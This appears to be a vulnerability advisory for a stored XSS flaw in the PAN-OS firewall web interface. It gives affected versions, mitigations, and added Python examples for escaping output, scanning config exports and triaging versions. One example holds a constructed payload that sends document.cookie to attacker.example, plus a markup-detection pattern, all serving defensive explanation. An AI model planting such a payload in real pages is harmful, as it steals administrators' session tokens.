PAN-OS: Stored Cross-Site Scripting (XSS) Vulnerability in the Web Interface
CVSS 4.8 · CVE-2026-0266 · Jun 10, 2026
Palo Alto Networks
IT in OT - Palo Alto firewalls are commonly deployed at IT/OT network boundaries
Summary
A stored cross-site scripting (XSS) vulnerability in the PAN-OS web interface allows an authenticated administrator to inject JavaScript that is saved with the configuration. When other administrators open the affected configuration page, the stored payload executes in their browser session. The vulnerability affects PAN-OS on PA-Series and VM-Series firewalls and on Panorama (virtual and M-Series). Cloud NGFW and Prisma Access are not affected.
What this means
What could happen
A malicious administrator with web interface access could inject JavaScript code that executes in the browsers of other administrators, potentially stealing session tokens or triggering unauthorized firewall configuration changes. This affects only personnel with admin credentials who access the web interface.
Who's at risk
Network and security administrators at organizations running Palo Alto Networks PAN-OS firewalls (PA-Series or VM-Series) or Panorama management appliances. Cloud NGFW and Prisma Access do not require updates for this issue.
How it could be exploited
An attacker with valid administrator credentials logs into the PAN-OS web interface, injects a JavaScript payload into a configuration field or setting, and stores it. When other administrators view that page, the payload executes in their browser session, allowing the attacker to capture credentials, modify rules, or escalate privileges.
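The mechanics described above, as an added example that is not PAN-OS code and not a payload from the advisory: a toy rendering of a stored description field, first interpolated verbatim (the vulnerable pattern) and then HTML-encoded, followed by a scan of a constructed PAN-OS-style XML configuration export for field values that look like markup, which is a check an administrator can run against an exported config. The payload string, the config sample and the element paths are constructed for illustration and assume nothing about the real affected field.

```python
import html
import re
import xml.etree.ElementTree as ET

# Constructed example of what a malicious administrator might store in a
# free-text configuration field such as a rule description. Illustrative only.
STORED_PAYLOAD = (
    "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"
)


def render_unsafe(description: str) -> str:
    """Vulnerable pattern: the stored value is dropped into HTML verbatim,
    so any tags or event handlers it contains become live markup."""
    return f'<td class="description">{description}</td>'


def render_safe(description: str) -> str:
    """Hardened pattern: HTML-encode the value for the text-node context.
    quote=True also encodes " and ', so the same helper is safe inside a
    double-quoted attribute value."""
    return f'<td class="description">{html.escape(description, quote=True)}</td>'


# Things that have no business in a plain-text configuration field:
# a tag opener, an on*= event-handler attribute, or a javascript: URL.
MARKUP_RE = re.compile(r"</?[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def looks_like_markup(value: str) -> bool:
    return bool(MARKUP_RE.search(value))


def find_stored_markup(config_xml: str) -> list[tuple[str, str]]:
    """Walk an XML config export and return (path, value) for every text
    node or attribute that looks like HTML or JavaScript. The export stores
    '<' as '&lt;', so the check must run on parsed text, as it does here."""
    hits: list[tuple[str, str]] = []

    def walk(elem: ET.Element, path: str) -> None:
        if elem.text and looks_like_markup(elem.text):
            hits.append((path, elem.text.strip()))
        for key, val in elem.attrib.items():
            if looks_like_markup(val):
                hits.append((f"{path}@{key}", val))
        for child in elem:
            name = child.attrib.get("name")
            walk(child, f"{path}/{child.tag}" + (f"[{name}]" if name else ""))

    root = ET.fromstring(config_xml)
    walk(root, root.tag)
    return hits


# Constructed config fragment in the shape of a PAN-OS export (sample data,
# not a real device configuration). The second rule carries the payload,
# XML-escaped exactly as an export would write it.
SAMPLE_CONFIG = """<config>
  <devices><entry name="localhost.localdomain"><vsys><entry name="vsys1">
    <rulebase><security><rules>
      <entry name="allow-web">
        <description>Permit outbound HTTP/HTTPS</description>
      </entry>
      <entry name="allow-dns">
        <description>&lt;img src=x onerror=&quot;fetch('https://attacker.example/?c='+document.cookie)&quot;&gt;</description>
      </entry>
    </rules></security></rulebase>
  </entry></vsys></entry></devices>
</config>"""


if __name__ == "__main__":
    print("unsafe :", render_unsafe(STORED_PAYLOAD))
    print("safe   :", render_safe(STORED_PAYLOAD))
    for path, value in find_stored_markup(SAMPLE_CONFIG):
        print("suspicious value at", path, "->", value)
```

A match from the scan is a prompt to look at who last changed that object in the configuration log, not proof of exploitation; legitimate descriptions rarely contain a tag opener or an `on*=` attribute, but the patterns are deliberately broad.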
Prerequisites
- Valid administrator account on the PAN-OS web interface
- Access to the PAN-OS web management interface (typically port 443)
- Ability to view or modify configuration sections where the payload is stored (may require specific admin role)
Key factors:
- Requires valid administrator credentials
- Stored payload affects other admin sessions
- Low CVSS score (4.8)
Exploitability
Unlikely to be exploited — EPSS score 0.2%
Affected products (2)
2 with fix
Product          Affected versions   Fix status
PAN-OS           Below 12.1.5        12.1.5 and later
Prisma Access    Below 11.2.11       11.2.11 and later
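To decide which devices need the scheduled update, an added example (not vendor tooling) that compares version strings against the fix releases in the table above. It parses PAN-OS-style "major.minor.maint" strings with an optional "-hN" hotfix suffix so that 12.1.10 sorts above 12.1.5, which a plain string comparison gets wrong. The inventory is constructed, and the assumption that every version numerically below the listed fix is affected follows the table's "Below X" wording; devices on older release trains should be checked against the vendor advisory for their own fixed versions.

```python
import re

# Fix thresholds exactly as listed in the advisory's affected-products table.
FIXED_IN = {
    "PAN-OS": "12.1.5",
    "Prisma Access": "11.2.11",
}

# major.minor.maint with an optional -hN hotfix suffix (e.g. 12.1.4-h2).
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?$")


def parse_version(version: str) -> tuple[int, int, int, int]:
    """Turn '12.1.10' or '12.1.4-h2' into a tuple that sorts numerically.
    A missing hotfix suffix counts as hotfix 0, so 12.1.5-h1 >= 12.1.5."""
    match = VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised version string: {version!r}")
    major, minor, maint, hotfix = match.groups()
    return (int(major), int(minor), int(maint), int(hotfix or 0))


def is_affected(product: str, version: str) -> bool:
    """True when the running version is below the fixed release for the
    product. Assumption: 'Below X' in the table is read literally, so any
    numerically lower version, including older trains, is flagged."""
    fixed = FIXED_IN.get(product)
    if fixed is None:
        raise KeyError(f"no fix threshold known for {product!r}")
    return parse_version(version) < parse_version(fixed)


# Constructed inventory; hostnames and versions are sample data.
INVENTORY = [
    {"host": "fw-edge-01", "product": "PAN-OS", "version": "12.1.4"},
    {"host": "fw-edge-02", "product": "PAN-OS", "version": "12.1.5"},
    {"host": "fw-dc-01", "product": "PAN-OS", "version": "12.1.10"},
    {"host": "fw-ot-01", "product": "PAN-OS", "version": "12.1.4-h2"},
    {"host": "pa-tenant", "product": "Prisma Access", "version": "11.2.9"},
]


def triage(inventory: list[dict]) -> list[str]:
    """Return the hostnames that still need the update, in inventory order."""
    return [d["host"] for d in inventory if is_affected(d["product"], d["version"])]


if __name__ == "__main__":
    for host in triage(INVENTORY):
        print("needs update:", host)
```

The hotfix handling matters at the boundary: a device on 12.1.5-h1 is at or above the fix and is not reported, while 12.1.4-h2 still is.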
Remediation & Mitigation
Do now
HARDENING: Restrict web interface access (port 443) to a management network or trusted IP ranges using firewall rules or network segmentation
HARDENING: Implement role-based access control (RBAC) to limit which administrators can modify configuration fields where XSS payloads could be stored
Schedule — requires maintenance window
Patching may require a device reboot; plan for process interruption
PAN-OS
HOTFIX: Update PAN-OS to version 12.1.5 or later on all PA-Series and VM-Series firewalls
Prisma Access
HOTFIX: Update Prisma Access to version 11.2.11 or later
CVEs (1)
CVE-2026-0266